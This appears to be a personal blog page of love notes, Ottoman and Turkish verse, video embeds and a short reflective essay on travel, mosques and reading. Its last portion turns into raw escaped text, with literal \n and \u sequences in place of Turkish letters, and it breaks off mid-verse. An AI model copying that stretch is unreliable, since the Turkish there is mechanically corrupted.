_Uçsuz hayaller boyunca_ +
_Ben hep seni düşünürüm."_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How beautifully Nedim put it...

_"Sevdiğim cemâlin çünkim göremem_ +
_Çıkmasın hayâlin dil-i şeydâdan_ +
_Hâk-i pâye çünki yüzler süremem_ +
_Alayım peyâmın bâd-ı sabâdan"_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹❤️

video::6CmU7vvmVxw[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Gönlüm senin esirin, kalbim senin yerindir_

video::s2KQlEfbeRI[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::cDIkxp44qak[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

And then there is longing. It feels as though this feeling will never leave me.
+
I miss you so very much.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I have never deleted the photograph engraved upon my heart. It is lovelier than all photographs. +

As for me, I say whatever Bekir Bey has said.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Nesin a sen a güzel_

video::vweKToC3gu0[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Dûr etme yanından asla bendeni ey kâş-ı keman_

video::mmbPHRfJsOg[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How very beautiful, is it not? +
Because She, it turns out, likes this one.

video::ml0yoRT_e2c[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

There is a strange sorrow in this song, one that gathers you up and brings you here

video::Qprmq3Ol27A[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How good it is that you exist. Because you do, this stranger has found a harbor in this boundless ocean

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

You are one of a kind, truly one... Let me know that you are at my side, let me know that we dream the same dream, and I will wait.
💐💐💐

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

A little "tsk" for everything, really 😀

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I dream of a home.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I keep hoping that, God willing, a way will be found. Hope, too, is a kind of prayer. May no one grieve or be left in hardship: not you, not I, not our families :)

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How lovely it is to speak of you to the flowers. How lovely to talk about you.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

🐰🐐

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

My body, my soul, and my life are in your hands. Use them however you wish. I am my sultan's bondsman. Not in vain; on the contrary, a chance to become worthy of your love.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

What a beautiful day it was, and what a beautiful memory. A priceless weariness. How could I thank you enough for all of it? For the good fortune of seeing your smile, thanks will never suffice.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I am still looking at the window of the bus; you are smiling. Roses bloom on your rose face.

_"Ne çâre var ki firâkunla eglenem bir dem_ +
_Ne tâli'üm meded eyler visâle fırsat olur"_ +
(Nef'î)

_(Neither is there any remedy by which I might abide your absence for a single moment, nor does my fortune come to my aid and grant me the chance of union.)_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I am still watching the window of the bus.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

City that keeps my beloved's scent in your wind, I have come to take that scent from you. Drawing it, breath by breath, from your air...

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

It is as if I am leaving two cities at once. I shall fit two longings into my heart.

And never forget, will you: I love you.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

"Mm-hm" 💕

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Beautiful; how beautiful you have become

video::z7BFOVzLM8M[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

If I went to Taşhan and searched for your trace, if I reached Ali Paşa and paused there for a breath, if I paced the length of Behzat, if I made my way to Ballıca and drew a breath, if I watched for you at Çekenli, would I find you, my sultan?

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Sweet girl, it is the dream of being a good husband to you -perhaps the hope of it- that keeps me this hale.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I miss you so much.
It seems one feels the longing most for the one felt nearest.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::IC-3G7jWEbk[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Wherever you go, my angel, the heart I left in your palms goes there with you.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_"Vuslatından gönlümü Allah mehcûr etmesin_ +
_Rûhumu kabzeylesin senden beni dûr etmesin"_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Do not be sad, my angel. Never be sad. I take pride even in knowing you. Imagine, then, how I boast of loving you. No one would find it strange, no one would reproach it; and even if they did, so be it, it matters not at all. If I am to be reproached for loving you, I will call out to my master Kays: "Thank heavens, they have reproached me too!" +

Never be sad; smile, so that roses bloom on your rose face. I love you so, you whom I am honored to know.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Sen burada, kalbimdesin_ +
_Kalbim hep seninle atacak_

video::zCLJU1z8Cw4[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

My window opening onto the sky, my light, my radiance. I know that this helpless love of mine is not enough to be worthy of you. However much it grows, it remains that much too little.

Angel who encircles me with her love, my prayer is never to fall short of the aim of being a husband worthy of you.

Beauty whose laughter wakes the buds, my life is forfeit to be a smile upon your face.

Whatever I say, I will have said too little; whatever I have said, it will not have been worthy of you. At least this much I know.

I love you, dearest of my heart.
*How good that you were born.*


✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

My God, thanks be to You: for granting me the chance to know her, for engraving her love upon my heart.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

My one and only, how I have missed you

video::vd_mkHdZIEQ[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I love you from the heart, with all my soul 💕

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I liked this one. Perhaps you will like it too, my dear little soul.

video::5GfZahNlEh0[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Beautiful is whatever She likes.

video::9sIN1mlr2f8[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Dearest of my heart, my heart simply cannot bear your being sad. If only your face were always smiling. It suits you so well.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

If peace were an instrument, it could sound nothing but your voice, my angel. 💕


✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::CVHHLh99B3Q[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

She is my very life. I want her always at my side. Never to be apart...

How good that she exists.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

My scarf is soooo beautiful 😍

Because the one who chose it, the one it wraps, is beautiful.


✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Drinking water from your glass: an indescribable happiness. Thank you, my angel, for every moment.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

The peace and happiness of being at your side are like nothing else. If only I could always be at your side. Ah, if only.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Bir tek seni sevmek çok değil_

video::303967019[vimeo]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Looking back, I give thanks for every moment spent with you. Not only for the times when you were beside me (and I beside you). Every moment in which I missed you, thought of you, dreamed of you is precious too. In short: for all the time that has passed since your love alighted upon my heart, a thousand thanks.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::9XFXbSJ5Cis[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I turn and look at the time gone by. Of no moment can I say "if only it had not been"; each one is precious in its own right. +
Since the moment I came to love you (he means: fell in love with you), how much beauty you have let me live. +
For all of it I am grateful to you. Hearing your voice, seeing your rose face would never even cross my mind; I used to console myself with waiting for the full moon. +
Now, every time my telephone rings, it is suddenly the fourteenth of the moon. +
You know how the poet opens his poem: +
_Seninle bir yağmur başlıyor iplik iplik_ +
It is this rain that washes my soul and makes it clean. The rain you bring.
+
And you know how it goes on in the next line: +
_Bir güzellik doğuyor yüreğime şiirden_ +
You are the one who ushered beauty into my soul and my heart. This is your work. +
Sometimes I wonder: what have I done with my life until today? +
I loved you; that much alone is enough. +
See, saying so, another poem has come to mind. +
_Seni sevip çekildim dedim dünya bu kadar_ +
You are my world, my princess.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

You are my "how good that..." +
You are the one I am forever missing +

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

God willing, soon, and with His blessing; God willing. +
Amen.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Better than its sitting idle, I'd say; what do you think, my dear? 😀

video::2DPUAxvd978[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Ben kulunum sen efendimsin benim_

video::W0ggje8Y8Fo[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Bir kelebeksin, gonca çiceksin_ +
_Güzel meleksin, nazlı bebeksin_

video::1t_3ik1dx18[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

It seems I am captivated by you 💕

video::7dVnGZ5mgrQ[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Let this one stay here. It will be needed 😍

video::6pZwYgoL8L8[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I beg you, show the way to one who does not know what to do. Or let us walk this road together.

I love you, with a love beyond "Mahrû".

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Carrying your sorrow in my heart is beautiful too. +
God willing, my staying far from you will not last long. My breath fails me. Without you I have no worth. Do not draw it out, will you; come back again. God will open a good road for us, God willing.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Mind you do not go hungry. My thoughts are with you. Take good care of yourself, my most precious.

I nearly forgot: how good that you were born, my angel.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I have boarded the plane. 22.21

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

= Kısa Kısa (2)
:hp-tags:

On the trips I have been making once a week for some time now, I have come to notice that every journey reminds me of death in earnest. These journeys prompt me to remember the truth that, in daily life, I (we) shake off behind cemetery walls. Every journey, I have only just realized, has in fact been dropping this into my memory in some measure. The question "why" fastened itself to this intuition at once. The first answer that came to mind was this: "Death, after all, is itself a journey.
These short journeys are a miniature of that great journey." And I weighed myself thus as well: "Or is what you feel the fear of being unable to return?", "You see death, too, as a departure with no return; is it your fondness for the World that brings it to mind?" I set the two thoughts on the two pans of the scale; like children playing on a seesaw, I could not make out which were down and which were up.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

At the end of these journeys I let myself fall into the lap of a friend. It was none other than the Üsküdar Mihrimah Sultan Mosque, from which I had been away for some months, in whose courtyard I used to lose myself in the scampering of the cats. Each time, I watch her rose-figure from afar and make my way toward her with a little longing and a little joy. As night draws its blackest sheet over the sky, I step into her courtyard, and two friends, she and the Valide Sultan Mosque, fall to conversing. I do not interrupt them; I listen, and alongside them, the sound of the waters running from the fountain. The sun shows itself, leaving its shyness behind the crimsons. I see another friend, a friend whom staying away could not make distant. Then I say: "To see a friend is a festival."

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

What with travel, school, and work, a busyness closes in on me from all four sides. What I find more tiring, I think, is the way the tasks and duties ahead keep my mind occupied. In the midst of this busyness I kept watching for time to read a certain piece, and it simply was not granted. When I did read it, I took a pleasure I would not normally have taken. I think the eagerness I show for reading helps a bond form between me and the book or the text. The same thing shows itself again at moments when I am weighed down in spirit and mind, or when I feel lonely (the times I feel lonely despite having lived alone for years are fewer than my loneliness amid crowds). One of the novel's heroes touches my shoulder, another holds out a hand, a third smiles. The best example of this is _Nisan'ın 2 Günü_; though its telling is plain and simple, it was a novel in which I found a place for myself. A few years ago I had come across it in the school library and borrowed it.
I remember reading it one winter's day with my back against the radiator. The radiator had become one wall of the trench, and I could feel my feet touching the trench's other wall. A rifle, its stock at the tips of my feet, leaned against my shoulder.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I know a good person, and I say: if only I had come to know her sooner. And I load that "if only" with such feeling, such stress, that it cannot bear the weight; it is crushed. A mahrû -her lovely manner shining like the moon- is teaching how one becomes bedâyi-âşinâ (bedâyi-şinas), an intimate of beautiful things. How much of it I can learn, I do not know. Once more: *if only*...

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Cevdet Paşa's hand touched my shoulder.

_Nasıl çıldırmadım hayretdeyim hâlâ sevincimden_ +
_Lisânından seni sevdim sözün gûş itdiğim demler_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

The moon is in the sky, shining; it is the fourteenth of the moon.

_Sana vardır yüreğimde sözlerim_

video::So6VlDiHukI[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Dede Efendi, what do you say to this?

video::vvFUnXpoUSE[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_"Anlatıyorum, hiç konuşmadan,_ +
_Buğdayın içini dökmesi gibi..."_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

A prayer falls upon my heart from Kays's tongue: +
_"Gittikçe hüsnün eyle ziyâde nigârımın_ +
_Geldikçe derdine beter et müptelâ beni"_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

-_Why do you not speak in your own sentences?_ +
-How am I to speak, while this state veils my mind?
+\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. 
+\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir 